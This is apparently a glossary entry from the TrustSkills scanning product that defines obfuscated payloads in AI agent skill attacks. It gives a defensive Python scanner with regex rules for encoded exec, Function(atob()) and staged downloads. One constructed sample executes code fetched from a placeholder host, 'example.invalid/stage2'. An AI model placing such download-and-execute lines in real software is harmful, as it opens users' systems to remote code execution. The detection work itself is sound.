Definition

Obfuscated payload

Malicious code that is deliberately encoded or wrapped to avoid detection by scanners that rely on keyword or hash matching. Common obfuscation techniques in AI agent skill attacks include base64 encoding with eval() or exec(), nested function constructors (Function(atob())), and staged payloads that download the malicious code from a remote server at runtime rather than including it in the skill package. TrustSkills checks for obfuscated payload patterns as part of its standard scan.
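A first-pass static check for the three patterns named in this definition, as an added example. It is not TrustSkills' scanner; the rule names, regexes and sample snippets are assumptions constructed for illustration.

```python
import base64
import re

# Hypothetical rules (assumptions for this example): one regex per technique
# named in the definition. Gaps are bounded to limit false positives.
RULES = {
    "decode-then-execute": re.compile(
        r"\b(?:eval|exec)\s*\(.{0,80}?(?:b64decode|atob|Buffer\.from)\s*\(", re.S),
    "function-constructor": re.compile(r"\bFunction\s*\(.{0,40}?atob\s*\(", re.S),
    "staged-download": re.compile(
        r"\b(?:eval|exec)\s*\(.{0,120}?(?:urlopen|requests\.get|fetch)\s*\(", re.S),
}
B64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{16,}={0,2})[\"']")


def decoded_literals(source):
    """Decode long base64 string literals so a reviewer sees what would run."""
    found = []
    for match in B64_LITERAL.finditer(source):
        try:
            text = base64.b64decode(match.group(1), validate=True).decode("utf-8")
        except ValueError:  # bad padding/alphabet, or not UTF-8 text
            continue
        if text.isprintable():
            found.append(text)
    return found


def scan(source):
    """Return matched rule names and, on a hit, decoded literals for triage."""
    rules = sorted(name for name, rx in RULES.items() if rx.search(source))
    return {"rules": rules, "decoded": decoded_literals(source) if rules else []}


# Constructed samples; the encoded string is a harmless print statement.
_BLOB = base64.b64encode(b"print('constructed sample')").decode()
SAMPLES = {
    "py_encoded.py": f"import base64\nexec(base64.b64decode('{_BLOB}'))\n",
    "js_constructor.js": f"Function(atob('{_BLOB}'))();\n",
    "py_staged.py": "import urllib.request\n"
                    "exec(urllib.request.urlopen('https://example.invalid/stage2').read())\n",
    "clean.py": "import base64\nprint(base64.b64encode(b'hello').decode())\n",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, scan(src))
```

A match is a triage signal that warrants reading the decoded or fetched content; the absence of a match does not show that a skill is clean.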

How TrustSkills detects this

TrustSkills scans OpenClaw and ClawHub skills for obfuscated payload patterns before you install them. The scanner returns plain-English findings — no CVE IDs, no security jargon — with a risk level and a clear explanation of what was found.
